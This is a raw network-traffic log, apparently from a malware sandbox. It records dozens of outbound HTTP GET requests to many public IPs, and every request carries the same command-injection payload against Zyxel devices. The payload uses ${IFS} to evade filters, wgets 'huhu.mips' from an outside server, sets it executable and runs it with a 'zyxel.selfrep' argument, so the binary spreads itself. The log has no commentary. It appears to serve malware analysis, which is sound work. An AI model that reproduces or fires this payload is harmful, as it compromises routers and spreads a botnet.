                                            Feb 2, 2024 06:21:10.589308023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3807192.168.2.1552860213.188.5.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589332104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3808192.168.2.1548856173.147.243.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589342117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3809192.168.2.154397088.183.57.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589405060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3810192.168.2.153651686.61.24.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589437962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3811192.168.2.1541936181.132.237.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589458942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3812192.168.2.1540662202.254.133.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589509964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3813192.168.2.154842843.149.123.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589544058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3814192.168.2.1555292170.132.250.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589580059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3815192.168.2.1556854142.22.235.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589624882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3816192.168.2.15556924.55.71.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589677095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3817192.168.2.155660249.41.142.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589703083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3818192.168.2.1534370145.231.66.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589754105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3819192.168.2.154024489.113.70.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589803934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3820192.168.2.1546784114.227.28.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589835882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3821192.168.2.1533596216.137.233.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589864969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3822192.168.2.1549444202.199.169.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589912891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3823192.168.2.1557294154.255.97.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589915037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3824192.168.2.1550260189.106.243.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.589970112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3825192.168.2.154006070.122.86.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590020895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3826192.168.2.1543576188.64.102.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590044975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3827192.168.2.1558990167.223.132.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590078115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3828192.168.2.1547398139.157.203.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590110064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3829192.168.2.1537496187.221.193.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590137959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3830192.168.2.15337564.198.106.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590163946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3831192.168.2.1553508202.220.0.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590188026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3832192.168.2.1545520160.74.46.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590251923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3833192.168.2.1551992194.74.79.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590305090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3834192.168.2.1537844173.48.164.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590341091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3835192.168.2.153853465.9.91.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590363026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3836192.168.2.1551248204.4.181.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590416908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3837192.168.2.153694278.57.244.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590429068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3838192.168.2.1550358205.16.45.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590435982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3839192.168.2.155384870.44.3.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590466976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3840192.168.2.1559942218.5.167.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590526104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3841192.168.2.1549928123.47.178.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590555906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3842192.168.2.1546652161.171.131.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590595007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3843192.168.2.1555380151.62.158.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590650082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3844192.168.2.1551548152.50.143.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590679884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3845192.168.2.153519286.124.69.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590727091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3846192.168.2.1533908193.208.135.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590760946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3847192.168.2.1550144109.102.63.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590802908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3848192.168.2.1555056174.88.0.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590841055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3849192.168.2.1541208110.158.150.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590869904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3850192.168.2.155831063.19.242.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590918064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3851192.168.2.1557634186.161.55.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.590946913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3852192.168.2.153849090.129.9.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591001034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3853192.168.2.1540920164.219.126.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591031075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3854192.168.2.1545692140.111.102.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591080904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3855192.168.2.1540864115.0.101.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591109991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3856192.168.2.1555232187.176.9.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591120005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3857192.168.2.155900014.173.237.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591165066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3858192.168.2.1544374156.52.245.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591209888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3859192.168.2.1538382155.246.145.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591239929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3860192.168.2.1541096189.3.144.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591279984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3861192.168.2.153882268.246.96.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591306925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3862192.168.2.1545182116.61.71.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591350079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3863192.168.2.1533952187.204.20.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591358900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3864192.168.2.155407225.104.222.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591413021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3865192.168.2.1557016168.9.8.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591429949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3866192.168.2.1543224217.52.161.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591470957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3867192.168.2.1536594119.134.147.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591496944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3868192.168.2.1559448107.94.252.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591553926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3869192.168.2.15484228.145.137.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:10.591568947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3870192.168.2.153832448.68.203.68443
                                            TimestampBytes transferredDirectionData
